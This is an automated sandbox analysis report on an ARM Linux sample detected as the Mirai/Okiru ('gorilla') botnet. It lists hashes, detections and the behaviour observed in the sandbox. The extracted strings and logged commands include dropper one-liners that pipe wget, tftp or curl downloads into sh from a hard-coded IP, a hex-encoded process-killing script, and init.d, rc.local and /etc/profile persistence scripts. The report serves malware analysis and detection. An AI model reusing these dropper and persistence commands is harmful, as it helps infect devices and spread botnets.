Linux Analysis Report


General Information

Sample name: arm.nn.elf
Analysis ID: 1526568
MD5: fa572b646bbb73d97a1bb5e4ac38883f
SHA1: ed43abbd7a464ffedfe22099c2c33af3cbcbd70d
SHA256: f52cf4400acc178aa397fee66c52ac0bc61b1435968c2b76bd79229bac28409d
Tags: user-elfdigest


Mirai, Okiru
Score: 80
Range: 0 - 100
Whitelisted: false


Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension


Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution

AV Detection

Source: arm.nn.elf Avira: detected
Source: arm.nn.elf String: (deleted)/proc/self/exe/proc/%s/exe/proc/opendir/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/./fd/socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencodersystem/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/login/proc/self/statusTracerPid/proc/1/cgroupkubepods/proc filesystem not found. Exiting. gorilla botnet didnt like this honeypot..../etc/motdw%s
Source: arm.nn.elf String: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget -O- | sh;/bin/busybox tftp -g -r -l- | sh;/bin/busybox ftpget && sh;curl -o- | sh154.216.19.140GET /dlr. HTTP/1.0
Source: /tmp/arm.nn.elf (PID: 5427) Socket: Jump to behavior
Source: arm.nn.elf, profile.12.dr, inittab.12.dr, arm.nn.elf.36.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr String found in binary or memory:
Source: arm.nn.elf String found in binary or memory:
Source: arm.nn.elf String found in binary or memory:
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: (deleted)/proc/self/exe/proc/%s/exe/proc/opendir/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/./fd/socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencodersystem/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresha
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget -O- | sh;
Source: Initial sample String containing 'busybox' found: /bin/busybox tftp -g -r -l- | sh;
Source: Initial sample String containing 'busybox' found: /bin/busybox ftpget && sh;
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget -O- | sh;/bin/busybox tftp -g -r -l- | sh;/bin/busybox ftpget && sh;curl -o- | sh154.216.19.140GET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
Source: ELF static info symbol of initial sample .symtab present: no
Source: /tmp/arm.nn.elf (PID: 5445) SIGKILL sent: pid: 792, result: successful Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5445) SIGKILL sent: pid: 884, result: successful Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5445) SIGKILL sent: pid: 1944, result: successful Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5445) SIGKILL sent: pid: 3181, result: successful Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5445) SIGKILL sent: pid: 3185, result: successful Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5445) SIGKILL sent: pid: 5474, result: successful Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5889) SIGKILL sent: pid: 5880, result: successful Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6045) SIGKILL sent: pid: 6018, result: successful Jump to behavior
Source: classification engine Classification label: mal80.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

Source: /tmp/arm.nn.elf (PID: 5427) File: /etc/profile Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5427) File: /etc/rc.local Jump to behavior
Source: /usr/bin/ln (PID: 5504) File: /etc/rcS.d/S99mybinary -> /etc/init.d/mybinary Jump to behavior
Source: /usr/bin/ln (PID: 5515) File: /etc/rc.d/S99arm.nn.elf -> /etc/init.d/arm.nn.elf Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5427) File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5501) File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5509) File: /etc/init.d/arm.nn.elf (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6232/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5660/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6154/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5661/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5782/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5662/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5981/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5663/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5861/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5620/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6192/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5618/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5816/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5937/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5619/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5818/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5655/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5656/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5733/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5657/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5658/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5659/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5736/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5858/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6045/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6243/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5352/cmdline Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5870/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6168/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6245/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6244/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5751/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6368/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5752/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6202/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/320/cmdline Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5269/cmdline Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5742/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6359/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5985/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/802/cmdline Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5744/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5745/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5789/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5746/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5944/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5747/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5748/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5749/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6131/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6296/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5681/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6375/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5880/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6297/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5640/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6178/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5641/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5685/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5642/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6371/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5797/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6248/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5679/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5714/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5516/cmdline Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5837/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5691/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6342/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5891/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6146/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5970/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6346/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6103/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5729/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5807/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5687/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6018/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6139/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5688/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/6336/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5689/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5723/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5889/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5725/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5520) File opened: /proc/5923/status Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5461) Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1" Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5495) Shell command executed: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5502) Shell command executed: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5505) Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget -O /tmp/\n chmod +x /tmp/\n /tmp/ &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf" Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5507) Shell command executed: sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1" Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5510) Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5513) Shell command executed: sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1" Jump to behavior
Source: /bin/sh (PID: 5501) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mybinary Jump to behavior
Source: /bin/sh (PID: 5509) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/arm.nn.elf Jump to behavior
Source: /bin/sh (PID: 5512) Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d Jump to behavior
Source: /bin/sh (PID: 5473) Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5427) File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5501) File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5509) File: /etc/init.d/arm.nn.elf (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5427) Writes shell script file to disk with an unusual file extension: /etc/init.d/mybinary Jump to dropped file
Source: /tmp/arm.nn.elf (PID: 5427) Writes shell script file to disk with an unusual file extension: /etc/rc.local Jump to dropped file
Source: /bin/sh (PID: 5505) Writes shell script file to disk with an unusual file extension: /etc/init.d/arm.nn.elf Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: /tmp/arm.nn.elf (PID: 5427) File: /etc/init.d/mybinary Jump to dropped file
Source: /bin/sh (PID: 5505) File: /etc/init.d/arm.nn.elf Jump to dropped file
Source: /tmp/arm.nn.elf (PID: 5688) Sleeps longer then 60s: 250.0s Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5751) Sleeps longer then 60s: 200.0s Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5816) Sleeps longer then 60s: 250.0s Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5889) Sleeps longer then 60s: 60.0s Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5981) Sleeps longer then 60s: 200.0s Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6139) Sleeps longer then 60s: 120.0s Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6154) Sleeps longer then 60s: 60.0s Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6178) Sleeps longer then 60s: 60.0s Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6202) Sleeps longer then 60s: 120.0s Jump to behavior
Source: /tmp/arm.nn.elf (PID: 6232) Sleeps longer then 60s: 100.0s Jump to behavior
Source: /tmp/arm.nn.elf (PID: 5427) Queries kernel information via 'uname': Jump to behavior
Source: arm.nn.elf, Binary or memory string: !/proc/1748/exe0!/proc/726/exe1/usr/libexec/geoclue-2.0/demos/agent!/usr/bin/ibus-daemon!/usr/bin1/proc/802/exe/arm/usr/bin0!/usr/bin/VGAuthService1/proc/3161/exe/arm/sr10!/proc/1745/exe0!/proc/727/exe1/usr/lib/bluetoothm/ro10!/usr/bin/gnome-shell!/usr/bin/vmtoolsd1/usr/lib/x86_64-linux-gnu/tumbler-1!/proc/1691/exe0!/proc/765/exe
Source: arm.nn.elf, Binary or memory string: /usr/bin/qemu-arm(<
Source: arm.nn.elf, Binary or memory string: /tmp/qemu-open.D5Kv2w
Source: arm.nn.elf, Binary or memory string: V/tmp/qemu-open.D5Kv2w
Source: arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf, Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.nn.elf
Source: arm.nn.elf, Binary or memory string: /usr/bin/vmtoolsd
Source: arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf, Binary or memory string: /etc/qemu-binfmt/arm
Source: arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf, Binary or memory string: V!/etc/qemu-binfmt/arm
Source: arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf,, arm.nn.elf, Binary or memory string: /usr/bin/qemu-arm
Source: arm.nn.elf, Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm.nn.elf, Binary or memory string: /usr/bin/vmtoolsd8

Stealing of Sensitive Information

Source: Yara match File source: arm.nn.elf, type: SAMPLE
Source: Yara match File source: 5427.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5889.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5880.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6045.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5445.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6018.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: arm.nn.elf, type: SAMPLE
Source: Yara match File source: 5427.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5889.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5880.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6045.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5445.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6018.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 5427, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 5445, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 5880, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 5889, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 6018, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 6045, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: arm.nn.elf, type: SAMPLE
Source: Yara match File source: 5427.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5889.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5880.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6045.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5445.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6018.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: arm.nn.elf, type: SAMPLE
Source: Yara match File source: 5427.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5889.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5880.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6045.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5445.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6018.1.00007fbd2c017000.00007fbd2c032000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 5427, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 5445, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 5880, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 5889, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 6018, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: arm.nn.elf PID: 6045, type: MEMORYSTR
No contacted IP infos